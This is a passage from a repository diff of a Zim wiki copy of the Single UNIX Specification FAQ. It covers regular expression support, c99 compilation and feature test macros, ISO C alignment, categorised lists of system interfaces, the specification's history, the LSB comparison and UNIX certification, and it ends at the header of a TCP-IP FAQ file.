The directory structure does not cross into such system management issues as where user accounts are organized or software packages are installed. Refer to XBD, Section 10.1, Directory Structure and Files for more information. XBD, Chapter 10, Directory Structure and Devices also defines the mapping of control character sequences to real character values, and describes the actions an implementation must take when it cannot support certain terminal behavior.
|
||||
|
||||
Q15. What regular expressions are supported?
|
||||
|
||||
Both Basic Regular Expressions (BREs) and Extended Regular Expressions (EREs) are supported and are described in XBD, Chapter 9, Regular Expressions and all of the utilities and interfaces that use regular expressions refer back to this definition.
|
||||
|
||||
Basic regular expressions: csplit, ctags, ed, ex, expr, grep, more, nl, pax, pg, sed, vi
|
||||
|
||||
Extended regular expressions: awk, egrep, grep -E, lex
|
||||
|
||||
The functions regcomp() and regexec() in XSH, Chapter 3, System Interfaces implement regular expressions as defined in the Single UNIX Specification.
|
||||
|
||||
Q16. How should I compile a conforming program?
|
||||
|
||||
XCU defines c99 as the interface to the C compilation environment. The c99 interface is new to this version of the specification and an interface to the standard C compiler. The c89 and cc utilities are no longer defined in this version of the Single UNIX Specification although implementations may additionally support them for backwards-compatibility.
|
||||
|
||||
There are a number of tasks that must be done to effectively make the interface environment available to a program. A number of C-language macros, referred to as feature test macros, must be defined before any headers are included. These macros might more accurately be referred to as header configuration macros, as they control what symbols and prototypes will be exposed by the headers. The macro _XOPEN_SOURCE must be defined to a value of 600 to make available the functionality of the Single UNIX Specification, Version 3. With respect to POSIX functionality covered by the Single UNIX Specification, this is equivalent to defining the POSIX macro {_POSIX_C_SOURCE} to be 200112L.
|
||||
|
||||
Use of the {_XOPEN_SOURCE} macro should not be confused with the other feature test macros associated with Feature Groups and functionality, such as {_XOPEN_UNIX}. These feature test macros are the implementation's way of announcing functionality to the application.
|
||||
|
||||
Q17. What is the Relationship to the ISO C Standard?
|
||||
|
||||
The most recent revision to the ISO C standard occurred in 1999. The ISO C standard is itself independent of any operating system in so much as it may be implemented in many environments including hosted environments.
|
||||
|
||||
The Single UNIX Specification has a long history of building on the ISO C standard and deferring to it where applicable. Whereas revisions of POSIX.1 prior to the Austin Group specification built upon the ISO C standard by reference only, and also allowed support for traditional C as an alternative. The Single UNIX Specification in contrast, has always included manual pages for the ISO C interfaces.
|
||||
|
||||
The Version 3 Specification takes the latter approach. The standard developers believed it essential for a programmer to have a single complete reference place. They also recognized that deference to the formal standard had to be addressed for the duplicate interface definitions which occur in both the ISO C standard and their document.
|
||||
|
||||
It was agreed that where an interface has a version in the ISO C standard, the DESCRIPTION section should describe the relationship to the ISO C standard and markings added as appropriate within the manual page to show where the ISO C standard has been extended.
|
||||
|
||||
A block of text was added to the start of each affected reference page stating whether the page is aligned with the ISO C standard or extended. Each page was parsed for additions beyond the ISO C standard and these extensions are marked as CX extensions (for C Extensions).
|
||||
|
||||
Q18. What happened to the Networking Services Specification (XNS)?
|
||||
|
||||
Unlike previous versions of the Single UNIX Specification, for Version 3 the Networking Services have now been integrated into the Base Specifications. This includes sockets and IP address resolution interfaces. The X/Open Transport Interface (XTI) is no longer a requirement in Version 3 of the Single UNIX Specification. As with other functions in XSH, the application developer needs to define {_XOPEN_SOURCE} to be 600 prior to the inclusion of any Single UNIX Specification headers. The c99 compiler utilities recognize the additional -l operand for the xnet library.
|
||||
|
||||
Q19. What System Interfaces are included by Category?
|
||||
|
||||
The system interfaces in the Version 3 specification categorized by functional grouping are as follows:
|
||||
|
||||
Jump Interfaces
|
||||
|
||||
longjmp(), setjmp()
|
||||
|
||||
Maths Library Interfaces
|
||||
|
||||
acos(), acosf(), acosh(), acoshf(), acoshl(), acosl(), asin(), asinf(), asinh(), asinhf(), asinhl(), asinl(), atan(), atan2(), atan2f(), atan2l(), atanf(), atanh(), atanhf(), atanhl(), atanl(), cabs(), cabsf(), cabsl(), cacos(), cacosf(), cacosh(), cacoshf(), cacoshl(), cacosl(), carg(), cargf(), cargl(), casin(), casinf(), casinh(), casinhf(), casinhl(), casinl(), catan(), catanf(), catanh(), catanhf(), catanhl(), catanl(), cbrt(), cbrtf(), cbrtl(), ccos(), ccosf(), ccosh(), ccoshf(), ccoshl(), ccosl(), ceil(), ceilf(), ceill(), cexp(), cexpf(), cexpl(), cimag(), cimagf(), cimagl(), clog(), clogf(), clogl(), conj(), conjf(), conjl(), copysign(), copysignf(), copysignl(), cos(), cosf(), cosh(), coshf(), coshl(), cosl(), cpow(), cpowf(), cpowl(), cproj(), cprojf(), cprojl(), creal(), crealf(), creall(), csin(), csinf(), csinh(), csinhf(), csinhl(), csinl(), csqrt(), csqrtf(), csqrtl(), ctan(), ctanf(), ctanh(), ctanhf(), ctanhl(), ctanl(), erf(), erfc(), erfcf(), erfcl(), erff(), erfl(), exp(), exp2(), exp2f(), exp2l(), expf(), expl(), expm1(), expm1f(), expm1l(), fabs(), fabsf(), fabsl(), fdim(), fdimf(), fdiml(), floor(), floorf(), floorl(), fma(), fmaf(), fmal(), fmax(), fmaxf(), fmaxl(), fmin(), fminf(), fminl(), fmod(), fmodf(), fmodl(), fpclassify(), frexp(), frexpf(), frexpl(), hypot(), hypotf(), hypotl(), ilogb(), ilogbf(), ilogbl(), isfinite(), isgreater(), isgreaterequal(), isinf(), isless(), islessequal(), islessgreater(), isnan(), isnormal(), isunordered(), ldexp(), ldexpf(), ldexpl(), lgamma(), lgammaf(), lgammal(), llrint(), llrintf(), llrintl(), llround(), llroundf(), llroundl(), log(), log10(), log10f(), log10l(), log1p(), log1pf(), log1pl(), log2(), log2f(), log2l(), logb(), logbf(), logbl(), logf(), logl(), lrint(), lrintf(), lrintl(), lround(), lroundf(), lroundl(), modf(), modff(), modfl(), nan(), nanf(), nanl(), nearbyint(), nearbyintf(), nearbyintl(), nextafter(), nextafterf(), nextafterl(), nexttoward(), nexttowardf(), nexttowardl(), pow(), powf(), powl(), remainder(), remainderf(), remainderl(), remquo(), remquof(), remquol(), rint(), rintf(), rintl(), round(), roundf(), roundl(), scalbln(), scalblnf(), scalblnl(), scalbn(), scalbnf(), scalbnl(), signbit(), sin(), sinf(), sinh(), sinhf(), sinhl(), sinl(), sqrt(), sqrtf(), sqrtl(), tan(), tanf(), tanh(), tanhf(), tanhl(), tanl(), tgamma(), tgammaf(), tgammal(), trunc(), truncf(), truncl()
|
||||
|
||||
General ISO C Library Interfaces
|
||||
|
||||
abs(), asctime(), atof(), atoi(), atol(), atoll(), bsearch(), calloc(), ctime(), difftime(), div(), feclearexcept(), fegetenv(), fegetexceptflag(), fegetround(), feholdexcept(), feraiseexcept(), fesetenv(), fesetexceptflag(), fesetround(), fetestexcept(), feupdateenv(), free(), gmtime(), imaxabs(), imaxdiv(), isalnum(), isalpha(), isblank(), iscntrl(), isdigit(), isgraph(), islower(), isprint(), ispunct(), isspace(), isupper(), isxdigit(), labs(), ldiv(), llabs(), lldiv(), localeconv(), localtime(), malloc(), memchr(), memcmp(), memcpy(), memmove(), memset(), mktime(), qsort(), rand(), realloc(), setlocale(), snprintf(), sprintf(), srand(), sscanf(), strcat(), strchr(), strcmp(), strcoll(), strcpy(), strcspn(), strerror(), strftime(), strlen(), strncat(), strncmp(), strncpy(), strpbrk(), strrchr(), strspn(), strstr(), strtod(), strtof(), strtoimax(), strtok(), strtol(), strtold(), strtoll(), strtoul(), strtoull(), strtoumax(), strxfrm(), time(), tolower(), toupper(), tzname, tzset(), va_arg(), va_copy(), va_end(), va_start(), vsnprintf(), vsprintf(), vsscanf()
|
||||
|
||||
Thread-Safe General ISO C Library Interfaces
|
||||
|
||||
asctime_r(), ctime_r(), gmtime_r(), localtime_r(), rand_r(), strerror_r(), strtok_r()
|
||||
|
||||
Wide-Character ISO C Library Interfaces
|
||||
|
||||
btowc(), iswalnum(), iswalpha(), iswblank(), iswcntrl(), iswctype(), iswdigit(), iswgraph(), iswlower(), iswprint(), iswpunct(), iswspace(), iswupper(), iswxdigit(), mblen(), mbrlen(), mbrtowc(), mbsinit(), mbsrtowcs(), mbstowcs(), mbtowc(), swprintf(), swscanf(), towctrans(), towlower(), towupper(), vswprintf(), vswscanf(), wcrtomb(), wcscat(), wcschr(), wcscmp(), wcscoll(), wcscpy(), wcscspn(), wcsftime(), wcslen(), wcsncat(), wcsncmp(), wcsncpy(), wcspbrk(), wcsrchr(), wcsrtombs(), wcsspn(), wcsstr(), wcstod(), wcstof(), wcstoimax(), wcstok(), wcstol(), wcstold(), wcstoll(), wcstombs(), wcstoul(), wcstoull(), wcstoumax(), wcsxfrm(), wctob(), wctomb(), wctrans(), wctype(), wmemchr(), wmemcmp(), wmemcpy(), wmemmove(), wmemset()
|
||||
|
||||
General C Library Extension Interfaces
|
||||
|
||||
fnmatch(), getopt(), optarg, opterr, optind, optopt
|
||||
|
||||
Device Input and Output Interfaces
|
||||
|
||||
FD_CLR(), FD_ISSET(), FD_SET(), FD_ZERO(), clearerr(), close(), fclose(), fdopen(), feof(), ferror(), fflush(), fgetc(), fgets(), fileno(), fopen(), fprintf(), fputc(), fputs(), fread(), freopen(), fscanf(), fwrite(), getc(), getchar(), gets(), open(), perror(), printf(), pselect(), putc(), putchar(), puts(), read(), scanf(), select(), setbuf(), setvbuf(), stderr, stdin, stdout, ungetc(), vfprintf(), vfscanf(), vprintf(), vscanf(), write()
|
||||
|
||||
General Terminal Interfaces
|
||||
|
||||
cfgetispeed(), cfgetospeed(), cfsetispeed(), cfsetospeed(), ctermid(), isatty(), tcdrain(), tcflow(), tcflush(), tcgetattr(), tcsendbreak(), tcsetattr(), ttyname()
|
||||
|
||||
Thread-Safe General Terminal Interfaces
|
||||
|
||||
ttyname_r()
|
||||
|
||||
File Descriptor Management Interfaces
|
||||
|
||||
dup(), dup2(), fcntl(), fgetpos(), fseek(), fseeko(), fsetpos(), ftell(), ftello(), ftruncate(), lseek(), rewind()
|
||||
|
||||
FIFO Interfaces
|
||||
|
||||
mkfifo()
|
||||
|
||||
File Attributes Interfaces
|
||||
|
||||
chmod(), chown(), fchmod(), fchown(), umask()
|
||||
|
||||
Thread-Safe Stdio Locking Interfaces
|
||||
|
||||
flockfile(), ftrylockfile(), funlockfile(), getc_unlocked(), getchar_unlocked(), putc_unlocked(), putchar_unlocked()
|
||||
|
||||
File System Interfaces
|
||||
|
||||
access(), chdir(), closedir(), creat(), fpathconf(), fstat(), getcwd(), link(), mkdir(), opendir(), pathconf(), readdir(), remove(), rename(), rewinddir(), rmdir(), stat(), tmpfile(), tmpnam(), unlink(), utime()
|
||||
|
||||
File System Extensions Interfaces
|
||||
|
||||
glob(), globfree()
|
||||
|
||||
Thread-Safe File System Interfaces
|
||||
|
||||
readdir_r()
|
||||
|
||||
Job Control Interfaces
|
||||
|
||||
setpgid(), tcgetpgrp(), tcsetpgrp()
|
||||
|
||||
Multiple Processes Interfaces
|
||||
|
||||
_Exit(), _exit(), assert(), atexit(), clock(), execl(), execle(), execlp(), execv(), execve(), execvp(), exit(), fork(), getpgrp(), getpid(), getppid(), setsid(), sleep(), times(), wait(), waitpid()
|
||||
|
||||
Networking Interfaces
|
||||
|
||||
accept(), bind(), connect(), endhostent(), endnetent(), endprotoent(), endservent(), freeaddrinfo(), gai_strerror(), getaddrinfo(), gethostbyaddr(), gethostbyname(), gethostent(), gethostname(), getnameinfo(), getnetbyaddr(), getnetbyname(), getnetent(), getpeername(), getprotobyname(), getprotobynumber(), getprotoent(), getservbyname(), getservbyport(), getservent(), getsockname(), getsockopt(), h_errno, htonl(), htons(), if_freenameindex(), if_indextoname(), if_nameindex(), if_nametoindex(), inet_addr(), inet_ntoa(), inet_ntop(), inet_pton(), listen(), ntohl(), ntohs(), recv(), recvfrom(), recvmsg(), send(), sendmsg(), sendto(), sethostent(), setnetent(), setprotoent(), setservent(), setsockopt(), shutdown(), socket(), sockatmark(), socketpair()
|
||||
|
||||
Pipe Interfaces
|
||||
|
||||
pipe()
|
||||
|
||||
Regular Expressions Interfaces
|
||||
|
||||
regcomp(), regerror(), regexec(), regfree()
|
||||
|
||||
Shell and Utilities Interfaces
|
||||
|
||||
pclose(), popen(), system(), wordexp(), wordfree()
|
||||
|
||||
Signal Interfaces
|
||||
|
||||
abort(), alarm(), kill(), pause(), raise(), sigaction(), sigaddset(), sigdelset(), sigemptyset(), sigfillset(), sigismember(), signal(), sigpending(), sigprocmask(), sigsuspend(), sigwait()
|
||||
|
||||
Signal Jump Functions Interfaces
|
||||
|
||||
siglongjmp(), sigsetjmp()
|
||||
|
||||
Single Process Interfaces
|
||||
|
||||
confstr(), environ, errno, getenv(), setenv(), sysconf(), uname(), unsetenv()
|
||||
|
||||
Symbolic Links Interfaces
|
||||
|
||||
lstat(), readlink(), symlink()
|
||||
|
||||
System Database Interfaces
|
||||
|
||||
getgrgid(), getgrnam(), getpwnam(), getpwuid()
|
||||
|
||||
Thread-Safe System Database Interfaces
|
||||
|
||||
getgrgid_r(), getgrnam_r(), getpwnam_r(), getpwuid_r()
|
||||
|
||||
Threads Interfaces
|
||||
|
||||
pthread_addr_setstacksize(), pthread_atfork(), pthread_attr_destroy(), pthread_attr_getdetachstate(), pthread_attr_getstackaddr(), pthread_attr_getstacksize(), pthread_attr_init(), pthread_attr_setdetachstate(), pthread_attr_setschedparam(), pthread_attr_setstackaddr(), pthread_barrierattr_destroy(), pthread_barrierattr_getpshared(), pthread_barrierattr_init(), pthread_barrierattr_setpshared(), pthread_barrier_destroy(), pthread_barrier_init(), pthread_barrier_wait(), pthread_cancel(), pthread_cleanup_pop(), pthread_cleanup_push(), pthread_cond_broadcast(), pthread_cond_destroy(), pthread_cond_init(), pthread_cond_signal(), pthread_cond_timedwait(), pthread_cond_wait(), pthread_condattr_destroy(), pthread_condattr_getpshared(), pthread_condattr_init(), pthread_condattr_setpshared(), pthread_create(), pthread_detach(), pthread_equal(), pthread_exit(), pthread_getschedparam(), pthread_getspecific(), pthread_join(), pthread_key_create(), pthread_key_delete(), pthread_kill(), pthread_mutex_destroy(), pthread_mutex_init(), pthread_mutex_lock(), pthread_mutex_timedlock(), pthread_mutex_trylock(), pthread_mutex_unlock(), pthread_mutexattr_destroy(), pthread_mutexattr_getpshared(), pthread_mutexattr_init(), pthread_mutexattr_setpshared(), pthread_once(), pthread_rwlockattr_destroy(), pthread_rwlockattr_getpshared(), pthread_rwlockattr_init(), pthread_rwlockattr_setpshared(), pthread_rwlock_destroy(), pthread_rwlock_init(), pthread_rwlock_rdlock(), pthread_rwlock_timedrdlock(), pthread_rwlock_timedwrlock(), pthread_rwlock_tryrdlock(), pthread_rwlock_trywrlock(), pthread_rwlock_unlock(), pthread_rwlock_wrlock(), pthread_self(), pthread_setcancelstate(), pthread_setcanceltype(), pthread_setspecific(), pthread_sigmask(), pthread_spin_destroy(), pthread_spin_init(), pthread_spin_lock(), pthread_spin_trylock(), pthread_spin_unlock(), pthread_testcancel()
|
||||
|
||||
Realtime Threads Interfaces
|
||||
|
||||
pthread_attr_getinheritsched(), pthread_attr_getschedpolicy(), pthread_attr_getscope(), pthread_attr_setinheritsched(), pthread_attr_setschedpolicy(), pthread_attr_setscope(), pthread_getschedparam(), pthread_mutex_getprioceiling(), pthread_mutex_setprioceiling(), pthread_mutexattr_getprioceiling(), pthread_mutexattr_getprotocol(), pthread_mutexattr_setprioceiling(), pthread_mutexattr_setprotocol(), pthread_setschedparam()
|
||||
|
||||
Realtime Interfaces
|
||||
|
||||
aio_cancel(), aio_error(), aio_fsync(), aio_read(), aio_return(), aio_suspend(), aio_write(), clock_getres(), clock_gettime(), clock_settime(), fdatasync(), lio_listio(), mlock(), mlockall(), mq_close(), mq_getattr(), mq_notify(), mq_open(), mq_receive(), mq_send(), mq_setattr(), mq_timedreceive(), mq_timedsend(), mq_unlink(), munlock(), munlockall(), nanosleep(), sched_get_priority_max(), sched_get_priority_min(), sched_getparam(), sched_getscheduler(), sched_rr_get_interval(), sched_setparam(), sched_setscheduler(), sched_yield(), sem_close(), sem_destroy(), sem_getvalue(), sem_init(), sem_open(), sem_post(), sem_timedwait(), sem_trywait(), sem_unlink(), sem_wait(), shm_open(), shm_unlink(), sigqueue(), sigtimedwait(), sigwaitinfo(), timer_create(), timer_delete(), timer_getoverrun(), timer_gettime(), timer_settime()
|
||||
|
||||
Tracing Interfaces
|
||||
|
||||
posix_trace_attr_destroy(), posix_trace_attr_getclockres(), posix_trace_attr_getcreatetime(), posix_trace_attr_getgenversion(), posix_trace_attr_getinherited(), posix_trace_attr_getlogfullpolicy(), posix_trace_attr_getlogsize(), posix_trace_attr_getmaxdatasize(), posix_trace_attr_getmaxsystemeventsize(), posix_trace_attr_getmaxusereventsize(), posix_trace_attr_getname(), posix_trace_attr_getstreamfullpolicy(), posix_trace_attr_getstreamsize(), posix_trace_attr_init(), posix_trace_attr_setinherited(), posix_trace_attr_setlogfullpolicy(), posix_trace_attr_setlogsize(), posix_trace_attr_setmaxdatasize(), posix_trace_attr_setname(), posix_trace_attr_setstreamfullpolicy(), posix_trace_attr_setstreamsize(), posix_trace_clear(), posix_trace_close(), posix_trace_create(), posix_trace_create_withlog(), posix_trace_event(), posix_trace_eventid_equal(), posix_trace_eventid_get_name(), posix_trace_eventid_open(), posix_trace_eventset_add(), posix_trace_eventset_del(), posix_trace_eventset_empty(), posix_trace_eventset_fill(), posix_trace_eventset_ismember(), posix_trace_eventtypelist_getnext_id(), posix_trace_eventtypelist_rewind(), posix_trace_flush(), posix_trace_get_attr(), posix_trace_get_filter(), posix_trace_getnext_event(), posix_trace_get_status(), posix_trace_open(), posix_trace_rewind(), posix_trace_set_filter(), posix_trace_shutdown(), posix_trace_start(), posix_trace_stop(), posix_trace_timedgetnext_event(), posix_trace_trid_eventid_open(), posix_trace_trygetnext_event()
|
||||
|
||||
Advisory Interfaces Interfaces
|
||||
|
||||
posix_fadvise(), posix_fallocate(), posix_madvise()
|
||||
|
||||
Typed Memory Interfaces Interfaces
|
||||
|
||||
posix_mem_offset(), posix_typed_mem_get_info(), posix_typed_mem_open()
|
||||
|
||||
User and Group Interfaces
|
||||
|
||||
getegid(), geteuid(), getgid(), getgroups(), getlogin(), getuid(), setegid(), seteuid(), setgid(), setuid()
|
||||
|
||||
Thread-Safe User and Group Interfaces
|
||||
|
||||
getlogin_r()
|
||||
|
||||
Wide Character Device Input and Output Interfaces
|
||||
|
||||
fgetwc(), fgetws(), fputwc(), fputws(), fwide(), fwprintf(), fwscanf(), getwc(), getwchar(), putwc(), putwchar(), ungetwc(), vfwprintf(), vfwscanf(), vwprintf(), vwscanf(), wprintf(), wscanf()
|
||||
|
||||
XSI General C Library Interfaces
|
||||
|
||||
_tolower(), _toupper(), a64l(), daylight(), drand48(), erand48(), ffs(), getcontext(), getdate(), getsubopt(), hcreate(), hdestroy(), hsearch(), iconv(), iconv_close(), iconv_open(), initstate(), insque(), isascii(), jrand48(), l64a(), lcong48(), lfind(), lrand48(), lsearch(), makecontext(), memccpy(), mrand48(), nrand48(), random(), remque(), seed48(), setcontext(), setstate(), signgam, srand48(), srandom(), strcasecmp(), strdup(), strfmon(), strncasecmp(), strptime(), swab(), swapcontext(), tdelete(), tfind(), timezone(), toascii(), tsearch(), twalk()
|
||||
|
||||
XSI Encryption Interfaces
|
||||
|
||||
crypt(), encrypt(), setkey()
|
||||
|
||||
XSI Database Management Interfaces
|
||||
|
||||
dbm_clearerr(), dbm_close(), dbm_delete(), dbm_error(), dbm_fetch(), dbm_firstkey(), dbm_nextkey(), dbm_open(), dbm_store()
|
||||
|
||||
XSI Device Input and Output Interfaces
|
||||
|
||||
fmtmsg(), poll(), pread(), pwrite(), readv(), writev()
|
||||
|
||||
XSI General Terminal Interfaces
|
||||
|
||||
grantpt(), posix_openpt(), ptsname(), unlockpt()
|
||||
|
||||
XSI Dynamic Linking Interfaces
|
||||
|
||||
dlclose(), dlerror(), dlopen(), dlsym()
|
||||
|
||||
XSI File Descriptor Management Interfaces
|
||||
|
||||
truncate()
|
||||
|
||||
XSI File System Interfaces
|
||||
|
||||
basename(), dirname(), fchdir(), fstatvfs(), ftw(), lchown(), lockf(), mknod(), mkstemp(), nftw(), realpath(), seekdir(), statvfs(), sync(), telldir(), tempnam()
|
||||
|
||||
XSI Internationalization Interfaces
|
||||
|
||||
catclose(), catgets(), catopen(), nl_langinfo()
|
||||
|
||||
XSI Interprocess Communication Interfaces
|
||||
|
||||
ftok(), msgctl(), msgget(), msgrcv(), msgsnd(), semctl(), semget(), semop(), shmat(), shmctl(), shmdt(), shmget()
|
||||
|
||||
XSI Job Control Interfaces
|
||||
|
||||
tcgetsid()
|
||||
|
||||
XSI Jump Functions Interfaces
|
||||
|
||||
_longjmp(), _setjmp()
|
||||
|
||||
XSI Maths Library Interfaces
|
||||
|
||||
j0(), j1(), jn(), scalb(), y0(), y1(), yn()
|
||||
|
||||
XSI Multiple Process Interfaces
|
||||
|
||||
getpgid(), getpriority(), getrlimit(), getrusage(), getsid(), nice(), setpgrp(), setpriority(), setrlimit(), ulimit(), usleep(), vfork(), waitid()
|
||||
|
||||
XSI Signal Interfaces
|
||||
|
||||
bsd_signal(), killpg(), sigaltstack(), sighold(), sigignore(), siginterrupt(), sigpause(), sigrelse(), sigset(), ualarm()
|
||||
|
||||
XSI Single Process Interfaces
|
||||
|
||||
gethostid(), gettimeofday(), putenv()
|
||||
|
||||
XSI System Database Interfaces
|
||||
|
||||
endpwent(), getpwent(), setpwent()
|
||||
|
||||
XSI System Logging Interfaces
|
||||
|
||||
closelog(), openlog(), setlogmask(), syslog()
|
||||
|
||||
XSI Thread Mutex Extensions Interfaces
|
||||
|
||||
pthread_mutexattr_gettype(), pthread_mutexattr_settype()
|
||||
|
||||
XSI Threads Extensions Interfaces
|
||||
|
||||
pthread_attr_getguardsize(), pthread_attr_setguardsize(), pthread_getconcurrency(), pthread_setconcurrency()
|
||||
|
||||
XSI Timers Interfaces
|
||||
|
||||
getitimer(), setitimer()
|
||||
|
||||
XSI User and Group Interfaces
|
||||
|
||||
endgrent(), endutxent(), getgrent(), getutxent(), getutxid(), getutxline(), pututxline(), setgrent(), setregid(), setreuid(), setutxent()
|
||||
|
||||
XSI Wide-Character Library Interfaces
|
||||
|
||||
wcswidth(), wcwidth()
|
||||
|
||||
XSI Legacy Interfaces
|
||||
|
||||
bcmp(), bcopy(), bzero(), ecvt(), fcvt(), ftime(), gcvt(), getwd(), index(), mktemp(), rindex(), utimes(), wcswcs()
|
||||
|
||||
Q20. What is the history of the development of the Single UNIX Specification?
|
||||
|
||||
The Open Group has been the custodian of the specification for the UNIX system and the trademark since 1994. This is a source level API specification which has traditionally built upon the formal IEEE POSIX standards. It is vendor neutral and not tied to any particular implementation.
|
||||
|
||||
The project that led to the creation of the Single UNIX Specification started when several vendors (Sun Microsystems, IBM, Hewlett-Packard, Novell/USL, and OSF) joined together to provide a single unified specification of the UNIX system services. By implementing a single common definition of the UNIX system services, third-party independent software vendors (ISVs) would be able to more easily deliver strategic applications on all of these vendors' platforms at once.
|
||||
|
||||
A two-pronged approach was used to develop the Single UNIX Specification. First, a set of formal industry specifications was chosen to form the overall base for the work. This would provide stability, vendor neutrality, and lay a well charted course for future application development, taking advantage of the careful work that has gone into developing these specifications. It would also preserve the portability of existing applications already developed to these core models.
|
||||
|
||||
The XPG4 Base (1992) was chosen as the stable functional base from which to start. XPG4 Base supports the POSIX.1 system interface and the ISO C standards at its core. It also provided a rich set of 174 commands and utilities.
|
||||
|
||||
To this base was added the traditional UNIX System V Interface Definition, (SVID) Edition 3, Level 1 calls, and the OSF Application Environment Specification Full Use interface definitions. This represented the stable central core of the latter two specifications.
|
||||
|
||||
The second part of the approach was to incorporate interfaces that were acknowledged common practice but had not yet been incorporated into any formal specification or standard. The intent was to ensure existing applications running on UNIX systems would port with relative ease to a platform supporting the Single UNIX Specification. A survey of real world applications was used to determine what additional interfaces would be required in the specification.
|
||||
|
||||
Fifty successful application packages were chosen to be analyzed using the following criteria:
|
||||
|
||||
- Ranked in International Data Corp's. 1992, 'Survey of Leading UNIX Applications',
|
||||
|
||||
- The application's domain of applicability was checked to ensure that no single application type (for example, databases) was overly represented,
|
||||
|
||||
- The application had to be available for analysis either as source code, or as a shared or dynamic linked library.
|
||||
|
||||
From the group of fifty, the top ten were selected carefully, ensuring that no more than two representative application packages in a particular problem space were chosen. The ten chosen applications were:
|
||||
|
||||
AutoCAD; Cadence; FrameMaker; Informix; Island Write/Paint; Lotus 1-2-3; SAS (4GL); Sybase; Teamwork; WordPerfect
|
||||
|
||||
APIs used by the applications that were not part of the base specifications were analyzed:
|
||||
|
||||
- If an API was used by any of the top ten applications, it was considered for inclusion.
|
||||
|
||||
- If an API was not used by one of the top ten, but was used by any three of the remaining 40 applications, it was considered for inclusion.
|
||||
|
||||
- While the investigation of these 50 applications was representative of large complex applications, it still was not considered as a broad enough survey, so an additional 3500 modules were scanned. If an API was used at least seven times in modules that came from at least two platforms (to screen out vendor specific libraries), then the interface was considered for inclusion.
|
||||
|
||||
When the survey was complete, there were 130 interfaces that did not already appear in the base specification. These interfaces were predominantly BSD interfaces that had never been covered in XPG4 Base, the SVID, or the AES, but did represent common practice in UNIX system applications developed originally on BSD-derived platforms. Such things as sockets and the 4.3BSD memory management calls were commonly used in many applications.
|
||||
|
||||
The goal was to ensure that APIs in common use were included, even if they were not in the formal specifications that made up the base. Making the Single UNIX Specification a superset of existing base specifications ensured any existing applications should work unmodified.
|
||||
|
||||
The Single UNIX Specification has evolved through several iterations; Version 2 in 1997 incorporated updates to the formal standards, as well as industry driven additions such as large file handling, dynamic linking, datasize neutrality and extended threads functionality. Version 3 in 2001 merges with the IEEE POSIX standard.
|
||||
|
||||
A list of the interfaces in Version 3 of the Single UNIX Specification together with comparative information on the presence of the interface in other specifications is available at http://www.unix.org/v3-apis.html
|
||||
|
||||
A wall poster with the history and timeline of the Single UNIX Specification is available at http://www.unix.org/Posters/
|
||||
|
||||
Q21. How does the Single UNIX Specification compare to the Linux Standard Base?
|
||||
|
||||
The Single UNIX Specification specifies application programming interfaces (APIs) at the source level, and is about application source code portability. Its neither a code implementation nor an operating system, but a stable definition of a programming interface that those systems supporting the specification guarantee to provide to the application programmer. Efforts such as the Linux Standard Base, and similarly the iBCS2 for x86 implementations of System V, are about binary portability and define a specific binary implementation of an interface to operating system services.
|
||||
|
||||
The LSB draws on the Single UNIX Specification for many of its interfaces although does not formally defer to it preferring to document any differences where they exist, such as where certain aspects of Linux cannot currently conform to the industry standards. Some interfaces are not included in the LSB, since they are outside the remit of a binary runtime environment, typically these are development interfaces or user level tools. Likewise there are some areas in the LSB that are outside the scope of the Single UNIX Specification (for example system administration interfaces).
|
||||
|
||||
Two white papers with further information on this topic are at: http://www.opengroup.org/platform/single_unix_specification/doc.tpl?gdid=6075, http://www.opengroup.org/platform/single_unix_specification/doc.tpl?gdid=5992.
|
||||
|
||||
Q22. What are the core technical changes in the latest version of the Single UNIX Specification?
|
||||
|
||||
The main changes are as follows: alignment with ISO/IEC 9899:1999 (ISO C), integration of the Networking Services volume (apart from XTI), support for IPv6, integration of recent POSIX realtime amendments ( 1003.1d, 1003.1j, 1003.1q), amendments to the core POSIX functionality from the 1003.2b and 1003.1a amendments, application of technical corrigendum from The Open Group and IEEE interpretations, revision of options , removal of obsolescent and legacy interfaces.
|
||||
|
||||
Q23. Does removal of obsolescent utility syntax mean that implementations supporting usages of head -5 file, tail -5 file, tail -l file are no longer allowed?
|
||||
|
||||
No, in general the intent of removing the obsolescent forms of the utility synopses was not to disallow them to be supported by implementations but to downgrade the status of their use in applications from conforming application using an obsolescent feature to non-conforming application. In general it is allowed for utilities to have extensions that violate the utility syntax guidelines so long as the forms defined in the standard that are required to follow the utility syntax guidelines do so. The cases cited fit the case. The Austin Group has more general cases under review at the present time.
|
||||
|
||||
Q24. Does an operating system have to be derived from AT&T/SCO code to meet the Single UNIX Specification?
|
||||
|
||||
No. As the owner of the UNIX trademark, The Open Group has separated the UNIX trademark from any actual code stream itself, thus allowing multiple implementations. Since the introduction of the Single UNIX Specification, there has been a single, open, consensus specification that defines the requirements for a conformant UNIX system.
|
||||
|
||||
Q25. What about UNIX Certification?
|
||||
|
||||
There is a mark, or brand, that is used to identify those products that have been certified as conforming to the Single UNIX Specification, initially UNIX 93, followed subsequently by UNIX 95, UNIX 98 and now UNIX 03. Information on the UNIX certification program which operates under The Open Group's Open Brand, can be found at http://www.opengroup.org/certification/idx/unix.html
|
||||
|
||||
The UNIX 03 Certification Guide is available at http://www.opengroup.org/openbrand/docs/UNIX03_Certification_Guide.html.
|
||||
|
||||
The Practical Guide to the Open Brand is available at http://www.opengroup.org/openbrand/Certification_Guide/
|
||||
|
||||
The register of Certified Products is available at http://www.opengroup.org/openbrand/register/
|
||||
|
||||
Q26. Where can I get a UNIX License Plate from?
|
||||
|
||||
The classic "Live Free or Die" license plates can be ordered from The Open Group's publications catalog at: http://www.opengroup.org/publications/catalog/n900.htm.
|
||||
|
||||
A wall poster with the story of the history of the license plate can be downloaded from http://www.unix.org/Posters/
|
||||
|
||||
Q27. How do I get permission to excerpt materials from the standard for reuse in my product?
|
||||
|
||||
All queries regarding permission to reproduce sections of the standard should be sent to austin-group-permissions at Open Group . Permission needs to be granted by both copyright holders, The IEEE and The Open Group.
|
||||
|
||||
Q28. How do I add a question to this FAQ?
|
||||
|
||||
Send the question (preferably with a proposed answer) to Andrew Josey.
|
||||
|
||||
105
Zim/Programme/APUE/FAQ/TCP-IP_FAQ.txt
Normal file
@@ -0,0 +1,105 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:34:37+08:00
|
||||
|
||||
====== TCP-IP FAQ ======
|
||||
Created 星期二 07 六月 2011
|
||||
http://www.itprc.com/tcpipfaq/default.htm
|
||||
Archive-name: internet/tcp-ip/tcp-ip-faq/contents
|
||||
Version: 5.15
|
